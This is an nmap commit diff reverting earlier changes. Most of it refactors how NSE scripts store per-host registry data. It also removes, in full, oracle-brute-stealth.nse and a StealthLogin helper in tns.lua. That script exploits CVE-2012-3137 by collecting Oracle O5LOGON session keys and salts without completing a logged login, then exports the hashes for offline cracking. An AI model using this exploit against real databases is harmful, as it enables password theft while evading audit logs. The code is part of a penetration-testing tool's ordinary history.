PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-22 15:39:03 +00:00
Code Issues Projects Releases Wiki Activity

reverted bad commits

Browse Source
This commit is contained in:
patrik
2012-10-06 19:38:15 +00:00
parent 10a34f626a
commit 655f766445
11 changed files with 56 additions and 295 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
nselib/brute.lua
View File

@@ -416,8 +416,8 @@ Engine =
account_guesses = {},
options = Options:new(),
}
setmetatable(o, self)
self.__index = self
setmetatable(o, self)
self.__index = self
o.max_threads = stdnse.get_script_args("brute.threads") or 10
return o
end,
@@ -476,7 +476,6 @@ Engine =
for user, pass in self.iterator do
-- makes sure the credentials have not been tested before
self.used_creds = self.used_creds or {}
pass = pass or "nil"
if ( not(self.used_creds[user..pass]) ) then
self.used_creds[user..pass] = true
coroutine.yield( user, pass )
@@ -685,9 +684,9 @@ Engine =
self.iterator = Iterators.credential_iterator( f )
elseif ( mode and mode == 'user' ) then
self.iterator = self.iterator or Iterators.user_pw_iterator( usernames, passwords )
self.iterator = Iterators.user_pw_iterator( usernames, passwords )
elseif( mode and mode == 'pass' ) then
self.iterator = self.iterator or Iterators.pw_user_iterator( usernames, passwords )
self.iterator = Iterators.pw_user_iterator( usernames, passwords )
elseif ( mode ) then
return false, ("Unsupported mode: %s"):format(mode)
-- Default to the pw_user_iterator in case no iterator was specified

2
nselib/creds.lua
View File

@@ -114,7 +114,6 @@ State = {
HOST_RESTRICTED = 128,
LOCKED_VALID = 256,
DISABLED_VALID = 512,
HASHED = 1024,
}
StateMsg = {
@@ -128,7 +127,6 @@ StateMsg = {
[State.HOST_RESTRICTED] = 'Valid credentials, account cannot log in from current host',
[State.LOCKED_VALID] = 'Valid credentials, account locked',
[State.DISABLED_VALID] = 'Valid credentials, account disabled',
[State.HASHED] = 'Hashed valid or invalid credentials',
}

27
nselib/netbios.lua
View File

@@ -264,12 +264,27 @@ function do_nbstat(host)
local socket = nmap.new_socket()
local encoded_name = name_encode("*")
local statistics
local reg
if type(host) == "string" then --ip
stdnse.print_debug(3, "Performing nbstat on host '%s'", host)
nmap.registry.netbios = nmap.registry.netbios or {}
nmap.registry.netbios[host] = nmap.registry.netbios[host] or {}
reg = nmap.registry.netbios[host]
else
stdnse.print_debug(3, "Performing nbstat on host '%s'", host.ip)
if host.registry.netbios == nil and
nmap.registry.netbios ~= nil and
nmap.registry.netbios[host.ip] ~= nil then
host.registry.netbios = nmap.registry.netbios[host.ip]
end
host.registry.netbios = host.registry.netbios or {}
reg = host.registry.netbios
end
stdnse.print_debug(3, "Performing nbstat on host '%s'", host)
-- Check if it's cased in the registry for this host
if(nmap.registry["nbstat_names_" .. host] ~= nil) then
-- Check if it's cached in the registry for this host
if(reg["nbstat_names"] ~= nil) then
stdnse.print_debug(3, " |_ [using cached value]")
return true, nmap.registry["nbstat_names_" .. host], nmap.registry["nbstat_statistics_" .. host]
return true, reg["nbstat_names"], reg["nbstat_statistics"]
end
-- Create the query header
@@ -369,8 +384,8 @@ function do_nbstat(host)
pos, statistics = bin.unpack(string.format(">A%d", rrlength), result, pos)
-- Put it in the registry, in case anybody else needs it
nmap.registry["nbstat_names_" .. host] = names
nmap.registry["nbstat_statistics_" .. host] = statistics
reg["nbstat_names"] = names
reg["nbstat_statistics"] = statistics
return true, names, statistics

42
nselib/smbauth.lua
View File

@@ -105,11 +105,11 @@ local ACCOUNT_TYPES = {
}
local function account_exists(host, username, domain)
if(nmap.registry[host.ip] == nil or nmap.registry[host.ip]['smbaccounts'] == nil) then
if(host.registry['smbaccounts'] == nil) then
return false
end
for i, j in pairs(nmap.registry[host.ip]['smbaccounts']) do
for i, j in pairs(host.registry['smbaccounts']) do
if(j['username'] == username and j['domain'] == domain) then
return true
end
@@ -120,13 +120,13 @@ end
function next_account(host, num)
if(num == nil) then
if(nmap.registry[host.ip]['smbindex'] == nil) then
nmap.registry[host.ip]['smbindex'] = 1
if(host.registry['smbindex'] == nil) then
host.registry['smbindex'] = 1
else
nmap.registry[host.ip]['smbindex'] = nmap.registry[host.ip]['smbindex'] + 1
host.registry['smbindex'] = host.registry['smbindex'] + 1
end
else
nmap.registry[host.ip]['smbindex'] = num
host.registry['smbindex'] = num
end
end
@@ -165,11 +165,8 @@ function add_account(host, username, domain, password, password_hash, hash_type,
return
end
if(nmap.registry[host.ip] == nil) then
nmap.registry[host.ip] = {}
end
if(nmap.registry[host.ip]['smbaccounts'] == nil) then
nmap.registry[host.ip]['smbaccounts'] = {}
if(host.registry['smbaccounts'] == nil) then
host.registry['smbaccounts'] = {}
end
-- Determine the type of account, if it wasn't given
@@ -204,10 +201,10 @@ function add_account(host, username, domain, password, password_hash, hash_type,
new_entry['account_type'] = account_type
-- Insert the new entry into the table
table.insert(nmap.registry[host.ip]['smbaccounts'], new_entry)
table.insert(host.registry['smbaccounts'], new_entry)
-- Sort the table based on the account type (we want anonymous at the end, administrator at the front)
table.sort(nmap.registry[host.ip]['smbaccounts'], function(a,b) return a['account_type'] > b['account_type'] end)
table.sort(host.registry['smbaccounts'], function(a,b) return a['account_type'] > b['account_type'] end)
-- Print a debug message
stdnse.print_debug(1, "SMB: Added account '%s' to account list", username)
@@ -215,7 +212,7 @@ function add_account(host, username, domain, password, password_hash, hash_type,
-- Reset the credentials
next_account(host, 1)
-- io.write("\n\n" .. nsedebug.tostr(nmap.registry[host.ip]['smbaccounts']) .. "\n\n")
-- io.write("\n\n" .. nsedebug.tostr(host.registry['smbaccounts']) .. "\n\n")
end
---Retrieve the current set of credentials set in the registry. If these fail, <code>next_credentials</code> should be
@@ -225,12 +222,12 @@ end
--@return (result, username, domain, password, password_hash, hash_type) If result is false, username is an error message. Otherwise, username and password are
-- the current username and password that should be used.
function get_account(host)
if(nmap.registry[host.ip]['smbindex'] == nil) then
nmap.registry[host.ip]['smbindex'] = 1
if(host.registry['smbindex'] == nil) then
host.registry['smbindex'] = 1
end
local index = nmap.registry[host.ip]['smbindex']
local account = nmap.registry[host.ip]['smbaccounts'][index]
local index = host.registry['smbindex']
local account = host.registry['smbaccounts'][index]
if(account == nil) then
return false, "No accounts left to try"
@@ -244,18 +241,13 @@ end
--
--@param host The host object.
function init_account(host)
-- Create the key if it exists
if(nmap.registry[host.ip] == nil) then
nmap.registry[host.ip] = {}
end
-- Don't run this more than once for each host
if(nmap.registry[host.ip]['smbaccounts'] ~= nil) then
if(host.registry['smbaccounts'] ~= nil) then
return
end
-- Create the list
nmap.registry[host.ip]['smbaccounts'] = {}
host.registry['smbaccounts'] = {}
-- Add the anonymous/guest accounts
add_account(host, '', '', '', nil, 'none')

21
nselib/tns.lua
View File

@@ -1754,27 +1754,6 @@ Helper = {
self.auth_session = data["AUTH_SESSION_ID"]
return true
end,
--- Steal auth data from database
-- @param user containing the Oracle user name
-- @param pass containing the Oracle user password
-- @return true on success, false on failure
-- @return err containing error message when status is false
StealthLogin = function( self, user, password )
local data, packet, status, tns, parser
local sesskey_enc, auth_pass, auth
local auth_options = AuthOptions:new()
status, auth = self.comm:exchTNSPacket( Packet.PreAuth:new( user, auth_options, self.os ) )
if ( not(status) ) then
return false, auth
end
if ( auth["AUTH_SESSKEY"] ) then
return true, auth
else
return false
end
end,
--- Queries the database
--

6
scripts/cvs-brute-repository.nse
View File

@@ -66,10 +66,8 @@ Driver =
if ( not(status) and err:match("I HATE YOU") ) then
-- let's store the repositories in the registry so the brute
-- script can use them later.
nmap.registry.cvs = nmap.registry.cvs or {}
nmap.registry.cvs[self.host.ip] = nmap.registry.cvs[self.host.ip] or {}
nmap.registry.cvs[self.host.ip].repos = nmap.registry.cvs[self.host.ip].repos or {}
table.insert(nmap.registry.cvs[self.host.ip].repos, password)
self.host.registry.cvs_repos = self.host.registry.cvs_repos or {}
table.insert(self.host.registry.cvs_repos, password)
return true, brute.Account:new(username, password, 0)
end
return false, brute.Error:new( "Incorrect password" )

7
scripts/cvs-brute.nse
View File

@@ -79,14 +79,11 @@ Driver =
local function getDiscoveredRepos(host)
if ( not(nmap.registry.cvs) or
not(nmap.registry.cvs[host.ip]) or
not(nmap.registry.cvs[host.ip].repos)
) then
if ( not(host.registry.cvs_repos)) then
return
end
return nmap.registry.cvs[host.ip].repos
return host.registry.cvs_repos
end
action = function(host, port)

12
scripts/nbstat.nse
View File

@@ -80,22 +80,22 @@ action = function(host)
-- Get the list of NetBIOS names
status, names, statistics = netbios.do_nbstat(host.ip)
status, names, statistics = netbios.do_nbstat(host.ip)
status, names, statistics = netbios.do_nbstat(host.ip)
status, names, statistics = netbios.do_nbstat(host.ip)
status, names, statistics = netbios.do_nbstat(host)
status, names, statistics = netbios.do_nbstat(host)
status, names, statistics = netbios.do_nbstat(host)
status, names, statistics = netbios.do_nbstat(host)
if(status == false) then
return stdnse.format_output(false, names)
end
-- Get the server name
status, server_name = netbios.get_server_name(host.ip, names)
status, server_name = netbios.get_server_name(host, names)
if(status == false) then
return stdnse.format_output(false, server_name)
end
-- Get the logged in user
status, user_name = netbios.get_user_name(host.ip, names)
status, user_name = netbios.get_user_name(host, names)
if(status == false) then
return stdnse.format_output(false, user_name)
end

199
scripts/oracle-brute-stealth.nse
View File

@@ -1,199 +0,0 @@
local brute = require "brute"
local coroutine = require "coroutine"
local creds = require "creds"
local io = require "io"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local tns = require "tns"
local unpwdb = require "unpwdb"
local openssl = stdnse.silent_require "openssl"
description = [[
Exploits the CVE-2012-3137 vulnerability, a weaknes in Oracle's O5LOGIN authentication scheme.
The vulnerability exists in Oracle 11g R1,R2 and allows linking the session key to a password hash.
When initiating an authentication attempt as a valid user the server will respond with a session key and salt.
Once received the script will disconnect the connection thereby not recording the login attempt.
The session key and salt can then be used to brute force the users password.
]]
---
-- @usage
-- nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL <host>
--
-- @output
-- PORT STATE SERVICE REASON
-- 1521/tcp open oracle syn-ack
-- | oracle-brute-stealth:
-- | Accounts
-- | dummy:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 - Hashed valid or invalid credentials
-- | nmap:$o5logon$D1B28967547DBA3917D7B129E339F96156C8E2FE5593D42540992118B3475214CA0F6580FD04C2625022054229CAAA8D*7BCF2ACF08F15F75B579 - Hashed valid or invalid credentials
-- | Statistics
-- |_ Performed 2 guesses in 1 seconds, average tps: 2
--
-- @args oracle-brute-stealth.sid - the instance against which to perform password guessing
-- @args oracle-brute-stealth.nodefault - do not attempt to guess any Oracle default accounts
-- @args oracle-brute-stealth.accounts - a list of comma separated accounts to test
-- @args oracle-brute-stealth.johnfile - if specified the hashes will be written to this file to be used by JtR
--
-- Version 0.1
-- Created 06/10/2012 - v0.1 - created by Dhiru Kholia
--
-- Summary
-- -------
-- x The Driver class contains the driver implementation used by the brute
-- library
author = "Dhiru Kholia"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive", "brute"}
portrule = shortport.port_or_service(1521, "oracle-tns", "tcp", "open")
local ConnectionPool = {}
local arg_johnfile = stdnse.get_script_args(SCRIPT_NAME .. '.johnfile')
local johnfile
Driver =
{
new = function(self, host, port, sid )
local o = { host = host, port = port, sid = sid }
setmetatable(o, self)
self.__index = self
return o
end,
--- Connects performs protocol negotiation
--
-- @return true on success, false on failure
connect = function( self )
local MAX_RETRIES = 10
local tries = MAX_RETRIES
self.helper = ConnectionPool[coroutine.running()]
if ( self.helper ) then return true end
self.helper = tns.Helper:new( self.host, self.port, self.sid )
-- This loop is intended for handling failed connections
-- A connection may fail for a number of different reasons.
-- For the moment, we're just handling the error code 12520
--
-- Error 12520 has been observed on Oracle XE and seems to
-- occur when a maximum connection count is reached.
local status, data
repeat
if ( tries < MAX_RETRIES ) then
stdnse.print_debug(2, "%s: Attempting to re-connect (attempt %d of %d)", SCRIPT_NAME, MAX_RETRIES - tries, MAX_RETRIES)
end
status, data = self.helper:Connect()
if ( not(status) ) then
stdnse.print_debug(2, "%s: ERROR: An Oracle %s error occured", SCRIPT_NAME, data)
self.helper:Close()
else
break
end
tries = tries - 1
stdnse.sleep(1)
until( tries == 0 or data ~= "12520" )
if ( status ) then
ConnectionPool[coroutine.running()] = self.helper
end
return status, data
end,
--- Attempts to login to the Oracle server
--
-- @param username string containing the login username
-- @param password string containing the login password
-- @return status, true on success, false on failure
-- @return brute.Error object on failure
-- brute.Account object on success
login = function( self, username, password )
local status, data = self.helper:StealthLogin( username, password )
if ( data["AUTH_VFR_DATA"] ) then
hash = string.format("$o5logon$%s*%s", data["AUTH_SESSKEY"], data["AUTH_VFR_DATA"])
if ( johnfile ) then
johnfile:write(("%s:%s\n"):format(username,hash))
end
return true, brute.Account:new(username, hash, creds.State.HASHED)
else
return false, brute.Error:new( data )
end
end,
--- Disconnects and terminates the Oracle TNS communication
disconnect = function( self )
return true
end,
}
action = function(host, port)
local DEFAULT_ACCOUNTS = "nselib/data/oracle-default-accounts.lst"
local sid = stdnse.get_script_args(SCRIPT_NAME .. '.sid') or stdnse.get_script_args('tns.sid')
local engine = brute.Engine:new(Driver, host, port, sid)
local arg_accounts = stdnse.get_script_args(SCRIPT_NAME .. '.accounts')
local mode = arg_accounts and "accounts" or "default"
if ( not(sid) ) then
return "\n ERROR: Oracle instance not set (see oracle-brute-stealth.sid or tns.sid)"
end
if ( arg_johnfile ) then
johnfile = io.open(arg_johnfile, "w")
if ( not(johnfile) ) then
return ("\n ERROR: Failed to open %s for writing"):format(johnfile)
end
end
local helper = tns.Helper:new( host, port, sid )
local status, result = helper:Connect()
if ( not(status) ) then
return "\n ERROR: Failed to connect to oracle server"
end
helper:Close()
if ( stdnse.get_script_args('userdb') or
stdnse.get_script_args('passdb') or
stdnse.get_script_args('oracle-brute-stealth.nodefault') or
stdnse.get_script_args('brute.credfile') ) then
mode = nil
end
if ( mode == "default" ) then
local f = nmap.fetchfile(DEFAULT_ACCOUNTS)
if ( not(f) ) then
return ("\n ERROR: Failed to find %s"):format(DEFAULT_ACCOUNTS)
end
f = io.open(f)
if ( not(f) ) then
return ("\n ERROR: Failed to open %s"):format(DEFAULT_ACCOUNTS)
end
engine.iterator = brute.Iterators.credential_iterator(f)
elseif( "accounts" == mode ) then
engine.iterator = unpwdb.table_iterator(stdnse.strsplit(",%s*", arg_accounts))
end
engine.options.useraspass = false
engine.options.mode = "user"
engine.options.script_name = SCRIPT_NAME
status, result = engine:start()
if ( johnfile ) then
johnfile:close()
end
return result
end

9
scripts/path-mtu.nse
View File

@@ -261,10 +261,7 @@ end
-- Sets necessary probe data in registry
local setreg = function(host, proto, port)
if not nmap.registry[host.ip] then
nmap.registry[host.ip] = {}
end
nmap.registry[host.ip]['pathmtuprobe'] = {
host.registry['pathmtuprobe'] = {
['proto'] = proto,
['port'] = port
}
@@ -301,8 +298,8 @@ action = function(host)
local mtuset
local sock = nmap.new_dnet()
local pcap = nmap.new_socket()
local proto = nmap.registry[host.ip]['pathmtuprobe']['proto']
local port = nmap.registry[host.ip]['pathmtuprobe']['port']
local proto = host.registry['pathmtuprobe']['proto']
local port = host.registry['pathmtuprobe']['port']
local saddr = packet.toip(host.bin_ip_src)
local daddr = packet.toip(host.bin_ip)
local try = nmap.new_try()

17
scripts/snmp-interfaces.nse
View File

@@ -45,6 +45,7 @@ dependencies = {"snmp-brute"}
-- Revised 04/11/2010 - v0.2 - moved snmp_walk to snmp library <patrik@cqure.net>
-- Revised 08/10/2010 - v0.3 - prerule; add interface addresses to Nmap's target list (Kris Katterjohn)
-- Revised 05/27/2011 - v0.4 - action; add MAC addresses to nmap.registry[host.ip]["mac-geolocation"] (Gorjan Petrovski)
-- Revised 07/31/2012 - v0.5 - action; remove mac-geolocation changes (script removed from trunk)
@@ -419,14 +420,6 @@ action = function(host, port)
srvport = port.number
end
-- table for mac-geolocation.nse
if not nmap.registry[srvhost] then
nmap.registry[srvhost] = {}
nmap.registry[srvhost]["mac-geolocation"] = {}
elseif not nmap.registry[srvhost]["mac-geolocation"] then
nmap.registry[srvhost]["mac-geolocation"] = {}
end
socket:set_timeout(5000)
try(socket:connect(srvhost, srvport, "udp"))
@@ -453,14 +446,6 @@ action = function(host, port)
end
local output = stdnse.format_output( true, build_results(interfaces) )
-- insert the MAC addresses into the mac-geolocation table
for _,item in ipairs(interfaces) do
if item.phys_addr then
table.insert(nmap.registry[srvhost]["mac-geolocation"], item.phys_addr:match("^(%x+:%x+:%x+:%x+:%x+:%x+)"))
end
end
-- wtf is this? table.insert(nmap.registry[srvhost]["mac-geolocation"], "00:23:69:2a:b1:27")
if SCRIPT_TYPE == "prerule" and target.ALLOW_NEW_TARGETS then
local sum = 0